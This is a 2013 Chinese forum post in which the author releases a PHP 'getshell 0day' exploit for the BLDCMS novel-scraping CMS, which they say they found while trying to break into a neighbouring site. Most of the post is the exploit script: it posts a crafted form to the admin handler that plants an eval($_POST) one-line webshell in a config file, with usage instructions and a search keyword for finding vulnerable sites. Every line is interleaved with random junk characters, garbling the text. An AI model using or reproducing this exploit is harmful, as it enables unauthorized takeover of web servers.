之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞" H! G3 u4 r6 _! u4 B* O/ N. m# X
& T# a( g; @7 h x% y
' U# B) \/ o6 Z. V$ z+ Y3 |3 M5 h
话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了 4 T+ G* U( e5 L* Y4 F3 D
8 N0 D: I3 i5 T( M既然都有人发了 我就把我之前写好的EXP放出来吧
; U2 I3 @1 v( ?4 S5 j
0 P/ g& `5 y2 s* g0 p/ h$ u1 M oview source print?01.php;">
6 `+ g" t0 V7 I* T' V' u$ q02.<!--?php
) ~, ?& K6 Z8 Y5 e1 v8 g$ r# @2 a4 q03.echo "-------------------------------------------------------------------
( d0 V5 S1 F* p04. & o. v2 r; a; u
05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP& |6 k! x4 B. h' U3 e
06. + M: g/ U, g! b3 n/ _9 h; y
07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun
; D* y, L9 n/ J V$ q08. 1 F4 N( I1 t; P+ d5 p
09.QQ:981009941\r\n 2013.3.21\r\n - u1 \# i% [ |
10. ; V# v8 d: k/ v/ |/ K' o+ {
11.
/ d$ ]& l1 ]1 c+ z12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码
6 Q. s" d, s6 J1 y# z- ~5 y13. 6 I5 d: D) Q) W! Q
14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------7 ^0 T& I+ ~" u, x4 {7 g0 l. N
15. / l, a T2 Y" N7 U
16.--------------------------------------------------------------------\r\n";/ p7 Q1 ]6 O L9 M* E5 b
17.$url=$argv[1];
) G2 u0 @- l) p- F: y0 g18.$dir=$argv[2];7 k/ i7 W: j9 L {- i" j
19.$pass=$argv[3];
4 u! V8 F* O! G0 |, ?" P' P( }- k20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
) }5 ~) {, P0 m1 ?3 K# p/ O+ V21.if (emptyempty($pass)||emptyempty($url))0 M0 E; f/ [3 k% S$ U
22.{exit("请输入参数");}4 u3 C& G" D. }4 ?. u& f6 _$ j
23.else
) H0 g7 I) J% m% u k& n- y) l! }24.{
1 j5 d* N4 ?5 e3 V5 X6 G25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev) g& x- i# d0 ]5 ^& L6 e
26. p' n: o- k4 _& ~% c+ X4 r& t
27.al;
2 M6 p* r3 r5 |" X. x; W28.$length = strlen($fuckdata);
9 S3 ^3 F5 B9 L/ u4 C29.function getshell($url,$pass)( _, W$ A% I( }
30.{+ _" P* b1 h/ r! d9 c6 }( ?
31.global $url,$dir,$pass,$eval,$length,$fuckdata;
- K2 \$ u; E& k2 x9 @0 x' j32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";0 W+ G @' j) v1 `. a9 W
33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
: a$ r/ z* |( d S34.$header .= "User-Agent: MSIE\r\n";1 c. P8 b" j8 m* c7 i
35.$header .= "Host:".$url."\r\n";
" n7 K! p3 ^# s4 o8 C2 i( q36.$header .= "Content-Length: ".$length."\r\n";
7 n! e- W7 K& R/ N+ F6 z37.$header .= "Connection: Close\r\n";
) P6 [, t) S: ~' ?/ M0 _9 M6 S38.$header .="\r\n";# I0 w* l; ^1 I/ Y8 i
39.$header .= $fuckdata."\r\n\r\n";
$ ]" r/ y% \, b1 p5 R/ U, e40.$fp = fsockopen($url, 80,$errno,$errstr,15);
; `# T% b1 Z3 C3 \9 _9 g41.if (!$fp)
& e8 ?4 A5 S; h7 X# B0 ?- N42.{) j7 j6 G+ m5 f2 a- e% e5 w2 ~4 Y
43.exit ("利用失败:请检查指定目标是否能正常打开");
F3 k- G& u" V44.}
- F1 f3 U7 n9 `- o; P0 ^1 k1 P8 u45.else{ if (!fputs($fp,$header))
+ [( B S5 g- \+ Z Y/ a: j3 L B, P46.{exit ("利用失败");}: w/ H6 i# m6 {4 O8 |
47.else4 |4 M! p% W! a6 q+ J2 e
48.{
* O- D) w( W) O5 D+ M49.$receive = '';
4 \: v( D' [, X4 M- Y9 I# b1 p50.while (!feof($fp)) {+ p5 G/ I4 i9 M
51.$receive .= @fgets($fp, 1000);
5 t2 t! ] [7 J, r% m1 t8 Y52.}7 b& ]& ^0 R V! W4 E! a7 Q- V
53.@fclose($fp);1 S" Z+ _2 y( K" d+ f" [: Q& y" K; _9 }
54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标) e# C* K) U* ^8 t
55. " J" s7 G& i2 o! ?5 u' ]
56.GPC是否=off)";; ~9 R7 T' o$ j( _ m
57.}}) D0 o; s1 V% z! j7 K# T
58.}5 Y+ w6 C$ y. _" G! R9 e
59.}' f/ Q7 ~0 K H: X
60.getshell($url,$pass);* \& g/ F. _$ _1 b6 l& B1 A
61.?-->
8 { M( E2 p! S8 S+ S4 b . M* m8 s* \: o/ q
# \# B6 Z6 ~, `, N. [. `5 {0 S
. P Y! s7 b }, ~, u& V# _by 数据流
8 ~* n6 F9 J( p' P |
发表于 2013-3-26 20:49:10
收藏
支持
反对